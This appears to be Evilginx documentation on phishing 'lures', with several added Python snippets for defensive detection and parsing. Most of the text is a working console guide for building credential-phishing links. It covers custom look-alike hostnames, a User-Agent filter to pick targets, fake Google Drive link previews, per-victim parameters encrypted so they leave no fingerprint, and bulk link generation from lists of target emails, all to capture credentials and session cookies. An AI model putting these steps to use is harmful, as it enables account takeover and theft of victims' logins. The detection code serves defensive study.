
Lures

Lures are essentially pre-generated phishing links, which you will be sending out on your engagements. Evilginx provides multiple options to customize your lures.

Create

A lure has to be assigned to a specific phishlet. For example, to create a lure for the linkedin phishlet, run:

: lures create linkedin

The lure you create will automatically get an ID assigned. Let's assume the ID of your new lure is 0. You can always check the list of your lures with:

: lures

Customize

By default, a lure URL comes with a randomly generated path. Its hostname is the one you set up for the phishlet, with the subdomain taken from the phishlet entry marked is_landing: true.

Your default lure URL should look like this:

: lures get-url 0

https://www.linkedin.not-a-phish.com/PlXFBIrM

You can already take this URL and send it out, but you will miss out on a lot of customizations you can introduce to make the lures look better.

Pause

You can pause a lure for a fixed time duration. Until the timer expires, the lure URL redirects visitors to the unauth_url you set up globally or for the specific phishlet.

The time duration must be entered in the 1d2h3m4s format.

If you want to pause a lure for 1 day and 12 hours:

: lures pause 0 1d12h

If you want to pause a lure for 5 minutes:

: lures pause 0 5m

If you want to pause a lure for 1 minute and 30 seconds:

: lures pause 0 1m30s
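The 1d2h3m4s format above is easy to check by hand, but a script that schedules or audits lure pauses has to parse it. The following is an added example, not code from Evilginx or from this page: it parses the format into a Python timedelta and rejects anything outside it. The rule that each unit appears at most once and in descending order is my assumption, since the page does not say how Evilginx treats other orderings.

```python
import re
from datetime import datetime, timedelta

# Assumed grammar for the documented 1d2h3m4s format: every unit is optional,
# appears at most once, and units run from largest to smallest. How Evilginx
# itself treats repeated or out-of-order units is not documented here, so
# this parser simply rejects them.
_DURATION_RE = re.compile(r"(?:(\d+)d)?(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")


def parse_pause_duration(text: str) -> timedelta:
    """Turn '1d12h', '5m' or '1m30s' into a timedelta; raise ValueError otherwise."""
    m = _DURATION_RE.fullmatch(text.strip())
    # An empty string matches the all-optional pattern, so also require one unit.
    if m is None or not any(m.groups()):
        raise ValueError(f"invalid duration {text!r}: expected the 1d2h3m4s format")
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return timedelta(days=days, hours=hours, minutes=minutes, seconds=seconds)


def is_valid_pause_duration(text: str) -> bool:
    """Convenience wrapper for validation without exception handling at the call site."""
    try:
        parse_pause_duration(text)
        return True
    except ValueError:
        return False


def pause_expires_at(start: datetime, text: str) -> datetime:
    """The moment a lure paused at `start` for the given duration becomes active again."""
    return start + parse_pause_duration(text)


if __name__ == "__main__":
    for sample in ("1d12h", "5m", "1m30s", "1d2h3m4s", "1h1d"):
        if is_valid_pause_duration(sample):
            print(f"{sample:>10} -> {parse_pause_duration(sample)}")
        else:
            print(f"{sample:>10} -> rejected")
```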

Unpause

Every paused lure can be unpaused at any time:

: lures unpause 0

Hostname

If you're not satisfied with the automatically generated hostname, you can pick any hostname for your lure, on condition that it ends with the top-level domain you set up for your Evilginx installation.

To change the hostname for your lure:

: lures edit 0 hostname this.is.a.legit.linkedin.not-a-phish.com

Setting a custom hostname for a lure also triggers automatic retrieval of TLS certificates.

Path

You can also entirely change the path of the phishing landing page for the selected lure.

: lures edit 0 path /downloads/RESUME.pdf

Redirector

Redirectors are small websites that act as a landing page for your phishing links. The selected redirector is shown to the visitor when the lure URL is opened. Their sole purpose is to redirect the user to the phishing login page, either automatically or after user interaction. You can customize your redirectors with custom variables embedded in their HTML files, written like {variable_name}. Values for these variables can be filled in automatically when generating lure URLs with lures get-url.

To set a specific redirector for your lure:

: lures edit 0 redirector download_example

Learn how to generate URLs with custom values for redirector variables in the Generate URL section below.

User-Agent filter

This option specifies a regular expression that the User-Agent HTTP header of incoming requests has to match for the request to be accepted. Requests that do not match are redirected the same way as requests to invalid lure URLs.

You can use this to filter out desktop or mobile clients if you only want to cover a specific target group.

: lures edit 0 ua_filter Mobile|Android|BlackBerry

Redirect URL

When the phished user successfully enters their credentials and Evilginx captures them together with the session cookies, the user is redirected to the URL defined under this option.

If this option is empty, Evilginx will try its best to continue reverse-proxying for logged-in users.

: lures edit 0 redirect_url https://drive.google.com/shared/document/0019234/preview

OpenGraph

OpenGraph is the current standard for meta tags that generate previews of website content when links are shared on messengers or social media. Evilginx fully supports customization of the previews for your phishing links. It injects the configured meta tags into both your redirectors and the reverse-proxied sign-in pages.

: lures edit 0 og_title "Download RESUME.pdf"
: lures edit 0 og_desc "Download your file securely - click to preview"
: lures edit 0 og_image https://breakdev.org/content/images/2020/09/evilginx_gone_phishing_blog.jpg
: lures edit 0 og_url https://drive.google.com/shared/document/0019234/preview

Here is a quick overview of all the options:

og_title
  Title (up to 60 characters)
  Example: Evilginx 2.4 - Gone Phishing
og_desc
  Description (up to 160 characters)
  Example: "Gone Phishing" 2.4 update to your favorite phishing framework is here. May the phishing season begin!
og_image
  Preview image URL (recommended 1200 x 630)
  Example: https://breakdev.org/content/images/2020/09/evilginx_gone_phishing_blog.jpg
og_url
  URL visible on the preview
  Example: https://breakdev.org/evilginx-2-4-gone-phishing/
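Because og_url and og_image need not have anything to do with the host that actually serves the page, the preview a recipient sees can name one site while the link resolves to another. The added example below is mine, not code from this page or from Evilginx: it extracts the og: meta tags from served HTML with Python's standard-library parser and reports og_url or og_image hosts that differ from the serving host, plus fields longer than the limits in the table above. That is the kind of check a link-preview or mail-security pipeline can run on a fetched page. The sample HTML is constructed from the og_* values configured on this page; the page URL is the one the path example above would produce.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _OpenGraphParser(HTMLParser):
    """Collect <meta property="og:..." content="..."> tags from an HTML document."""

    def __init__(self):
        super().__init__()
        self.tags = {}

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attr = dict(attrs)
        prop = attr.get("property") or ""
        content = attr.get("content")
        if prop.startswith("og:") and content is not None:
            self.tags.setdefault(prop, content)  # keep the first occurrence, as preview fetchers do


def extract_og_tags(html: str) -> dict:
    """Return {"og:title": ..., "og:url": ..., ...} for the given HTML."""
    parser = _OpenGraphParser()
    parser.feed(html)
    return parser.tags


def og_findings(page_url: str, html: str) -> list:
    """Triage findings for a link preview: og:url / og:image hosts that differ
    from the host actually serving the page, and fields over the length limits."""
    tags = extract_og_tags(html)
    served_host = (urlparse(page_url).hostname or "").lower()
    findings = []
    for key in ("og:url", "og:image"):
        value = tags.get(key)
        if not value:
            continue
        host = (urlparse(value).hostname or "").lower()
        if host and host != served_host:
            findings.append(f"{key} points at {host} but the page is served from {served_host}")
    for key, limit in (("og:title", 60), ("og:description", 160)):
        if len(tags.get(key, "")) > limit:
            findings.append(f"{key} exceeds the recommended {limit} characters")
    return findings


# Constructed sample: the og_* values configured on this page, as a messenger's
# link-preview fetcher would see them in the served HTML.
SAMPLE_PAGE_URL = "https://www.linkedin.not-a-phish.com/downloads/RESUME.pdf"
SAMPLE_HTML = """<!doctype html><html><head>
<meta property="og:title" content="Download RESUME.pdf">
<meta property="og:description" content="Download your file securely - click to preview">
<meta property="og:image" content="https://breakdev.org/content/images/2020/09/evilginx_gone_phishing_blog.jpg">
<meta property="og:url" content="https://drive.google.com/shared/document/0019234/preview">
</head><body></body></html>"""

if __name__ == "__main__":
    for finding in og_findings(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("-", finding)
```

A host mismatch on og:image alone is common on legitimate sites that serve images from a CDN, so treat the og:url mismatch as the stronger signal and feed both into whatever scoring the pipeline already does on the link's host.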

Information (Notes)

You can also set private notes for your lure:

: lures edit 0 info "This is a test lure - do not use on engagements"

Generate URL

When you're done customizing your lure, you can start generating your phishing links, which you'll be sending out in your engagement.

Single

If your lure does not use custom variables through a redirector or a js_inject section in your phishlet, you can generate a link simply like this:

: lures get-url 0

If your phishing campaign uses personalized redirectors, or pre-fills some sign-in form data (where the phishlet you're using allows it), you can specify custom variables while generating phishing links.

Let's say your redirector and/or js_inject script makes use of the target's email and name:

: lures get-url 0 email=john.doe@company.com name="John Doe"

Note: you can escape " characters with \".

The values for the defined custom variables are encrypted into a single GET parameter of the link. The parameter name is always randomly generated and the encrypted value is always unique, even when the same values are used multiple times. This ensures that the GET parameters cannot be fingerprinted later on, as they never provide a static signature.
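The paragraph above is about the absence of a static signature: the parameter name and the ciphertext change on every link. What does stay constant is the shape of the query string. The added example below is mine, not code from this page or from Evilginx: a triage heuristic for a proxy-log or URL-rewriting pipeline that flags URLs whose query consists of exactly one short-named parameter carrying a long, high-entropy url-safe-base64 value. The sample input is the three exported links from this page plus constructed benign URLs; the length and entropy thresholds are assumptions tuned to those samples, not Evilginx constants.

```python
import math
import re
from urllib.parse import parse_qsl, urlparse

# url-safe base64 alphabet, as used by the exported links on this page
_URLSAFE_B64 = re.compile(r"^[A-Za-z0-9_-]+$")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_opaque_single_param(url: str, min_len: int = 32, min_entropy: float = 4.0) -> bool:
    """Heuristic: exactly one query parameter, a short alphabetic name, and a long
    high-entropy url-safe-base64 value. Thresholds are assumptions (see lead-in)."""
    params = parse_qsl(urlparse(url).query, keep_blank_values=True)
    if len(params) != 1:
        return False
    name, value = params[0]
    return (
        1 <= len(name) <= 4
        and name.isalpha()
        and len(value) >= min_len
        and _URLSAFE_B64.match(value) is not None
        and shannon_entropy(value) >= min_entropy
    )


def flag_urls(urls) -> list:
    """Return the subset of urls that match the heuristic, preserving order."""
    return [u for u in urls if looks_like_opaque_single_param(u)]


# Constructed sample: the three exported links shown on this page, followed by
# benign URLs that should not be flagged (fixed page number, two parameters, no query).
SAMPLE_URLS = [
    "https://www.linkedin.not-a-phish.com/download/RESUME.pdf?h=WYofPy3LHfWukWZvz55jLf8LNJ_ys0-IMGLxtn246RXGIE2Ep8q1kijrEoO5QkN0Gg",
    "https://www.linkedin.not-a-phish.com/download/RESUME.pdf?jck=CFSmJJcaWrS--tPAGJbbM5mGdc4wJ_dDtf0GoVYeH3u33q43LExgnG0",
    "https://www.linkedin.not-a-phish.com/download/RESUME.pdf?t=YTvVbl6ZQHMUKBbF88TRrv_gkSA8tdVV0USJTt5EjWDDlArmGvnaA2amm9l7",
    "https://docs.example.com/guide/lures?page=3",
    "https://files.example.com/share?id=8841&token=abc",
    "https://www.example.com/article/2020/09/phishing-season",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        mark = "FLAG" if looks_like_opaque_single_param(url) else "    "
        print(mark, url)
```

Signed download links, unsubscribe links and many tracking redirectors have the same shape, so on its own this heuristic produces false positives; it is a reason to look closer, to be combined with the usual signals about the link's host (age of the domain, resemblance to a brand the recipient uses, absence from the organisation's allow-list), not a verdict.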

Multiple

Understandably, your engagements will require generating dozens if not hundreds of personalized phishing links. Evilginx thankfully provides a way to generate the links in bulk, all at once.

You can provide an input file with your custom variables in CSV or JSON format.

This is an example CSV input file. The first row specifies the variable names as column names and the rows below contain just the values:

email,name
john.doe@company.com,John Doe
elle@company.com,Elle
steven@company.com,Steven

The same input file in JSON format would look like the following:

[{
"email":"john.doe@company.com",
"name":"John Doe"
},{
"email":"elle@company.com",
"name":"Elle"
},{
"email":"steven@company.com",
"name":"Steven"
}]

To import the custom variables from an input file and output the generated links in the terminal:

: lures get-url 0 import input.csv

Or

: lures get-url 0 import input.json

It may be more convenient to export the generated links to a file, which is also possible:

: lures get-url 0 import input.csv export targets.txt

The exported output also includes the original values as comments, so that you know which link contains which parameters:

https://www.linkedin.not-a-phish.com/download/RESUME.pdf?h=WYofPy3LHfWukWZvz55jLf8LNJ_ys0-IMGLxtn246RXGIE2Ep8q1kijrEoO5QkN0Gg ; email="john.doe@company.com" name="John Doe"
https://www.linkedin.not-a-phish.com/download/RESUME.pdf?jck=CFSmJJcaWrS--tPAGJbbM5mGdc4wJ_dDtf0GoVYeH3u33q43LExgnG0 ; email="elle@company.com" name="Elle"
https://www.linkedin.not-a-phish.com/download/RESUME.pdf?t=YTvVbl6ZQHMUKBbF88TRrv_gkSA8tdVV0USJTt5EjWDDlArmGvnaA2amm9l7 ; email="steven@company.com" name="Steven"
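The input and export formats above are simple, but anything that consumes them should still validate them: every input record must define the same variable names, and an exported line carries its values as quoted key="value" assignments after " ; ". The added example below is mine, not code from this page or from Evilginx. It loads CSV or JSON input in the layouts shown above, parses exported lines back into records, and checks that an export reproduces its input in order, which is the same check a responder would run to list the recipients recorded in a recovered export file. The samples are the ones on this page; using shlex for the quoting, including the \" escape mentioned above, is an assumption about how Evilginx quotes values.

```python
import csv
import io
import json
import shlex


def load_variables(text: str, fmt: str) -> list:
    """Load custom-variable records from CSV (header row = variable names) or
    JSON (list of objects) text. Every record must use the same variable names."""
    if fmt == "csv":
        rows = [dict(r) for r in csv.DictReader(io.StringIO(text))]
    elif fmt == "json":
        rows = json.loads(text)
        if not isinstance(rows, list) or not all(isinstance(r, dict) for r in rows):
            raise ValueError("JSON input must be a list of objects")
    else:
        raise ValueError(f"unsupported format {fmt!r}")
    keys = set(rows[0]) if rows else set()
    for i, row in enumerate(rows):
        if set(row) != keys:
            raise ValueError(f"record {i} has variables {sorted(row)}, expected {sorted(keys)}")
    return rows


def parse_export_line(line: str) -> tuple:
    """Split an exported line 'URL ; key="value" key2="value"' into (url, variables)."""
    url, sep, rest = line.partition(" ; ")
    if not sep:
        raise ValueError(f"no ' ; ' separator in line: {line!r}")
    variables = {}
    # shlex (POSIX mode) strips the double quotes and honours backslash-escaped
    # quotes inside them, matching the \" escape documented for get-url.
    for token in shlex.split(rest):
        key, eq, value = token.partition("=")
        if not eq:
            raise ValueError(f"malformed assignment {token!r}")
        variables[key] = value
    return url.strip(), variables


def parse_export(text: str) -> list:
    """Parse a whole export file into a list of (url, variables) tuples."""
    return [parse_export_line(ln) for ln in text.splitlines() if ln.strip()]


def export_matches_input(export_text: str, records: list) -> bool:
    """True when the comments on the exported lines reproduce the input records, in order."""
    return [variables for _, variables in parse_export(export_text)] == records


# Constructed samples, copied from the input and export examples on this page.
SAMPLE_CSV = (
    "email,name\n"
    "john.doe@company.com,John Doe\n"
    "elle@company.com,Elle\n"
    "steven@company.com,Steven\n"
)
SAMPLE_JSON = """[{
"email":"john.doe@company.com",
"name":"John Doe"
},{
"email":"elle@company.com",
"name":"Elle"
},{
"email":"steven@company.com",
"name":"Steven"
}]"""
SAMPLE_EXPORT = """\
https://www.linkedin.not-a-phish.com/download/RESUME.pdf?h=WYofPy3LHfWukWZvz55jLf8LNJ_ys0-IMGLxtn246RXGIE2Ep8q1kijrEoO5QkN0Gg ; email="john.doe@company.com" name="John Doe"
https://www.linkedin.not-a-phish.com/download/RESUME.pdf?jck=CFSmJJcaWrS--tPAGJbbM5mGdc4wJ_dDtf0GoVYeH3u33q43LExgnG0 ; email="elle@company.com" name="Elle"
https://www.linkedin.not-a-phish.com/download/RESUME.pdf?t=YTvVbl6ZQHMUKBbF88TRrv_gkSA8tdVV0USJTt5EjWDDlArmGvnaA2amm9l7 ; email="steven@company.com" name="Steven"
"""

if __name__ == "__main__":
    records = load_variables(SAMPLE_CSV, "csv")
    print("csv and json agree:", records == load_variables(SAMPLE_JSON, "json"))
    print("export matches input:", export_matches_input(SAMPLE_EXPORT, records))
    for url, variables in parse_export(SAMPLE_EXPORT):
        print(variables["email"], "->", url)
```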

Commands

: help lures

lures

Shows all create lures and allows to edit or delete them.

lures
show all create lures
lures <id>
show details of a lure with a given <id>
lures create <phishlet>
creates new lure for given <phishlet>
lures delete <id>
deletes lure with given <id>
lures delete all
deletes all created lures
lures get-url <id> <key1=value1> <key2=value2>
generates a phishing url for a lure with a given <id>, with optional parameters
lures get-url <id> import <params_file> export <urls_file> <text|csv|json>
generates phishing urls, importing parameters from <import_path> file and exporting them to <export_path>
lures edit <id> hostname <hostname>
sets custom phishing <hostname> for a lure with a given <id>
lures edit <id> path <path>
sets custom url <path> for a lure with a given <id>
lures edit <id> redirector <path>
sets an html redirector directory <path> for a lure with a given <id>
lures edit <id> ua_filter <regexp>
sets a regular expression user-agent whitelist filter <regexp> for a lure with a given <id>
lures edit <id> redirect_url <redirect_url>
sets redirect url that user will be navigated to on successful authorization, for a lure with a given <id>
lures edit <id> phishlet <phishlet>
change the phishlet, the lure with a given <id> applies to
lures edit <id> info <info>
set personal information to describe a lure with a given <id> (display only)
lures edit <id> og_title <title>
sets opengraph title that will be shown in link preview, for a lure with a given <id>
lures edit <id> og_des <title>
sets opengraph description that will be shown in link preview, for a lure with a given <id>
lures edit <id> og_image <title>
sets opengraph image url that will be shown in link preview, for a lure with a given <id>
lures edit <id> og_url <title>
sets opengraph url that will be shown in link preview, for a lure with a given <id>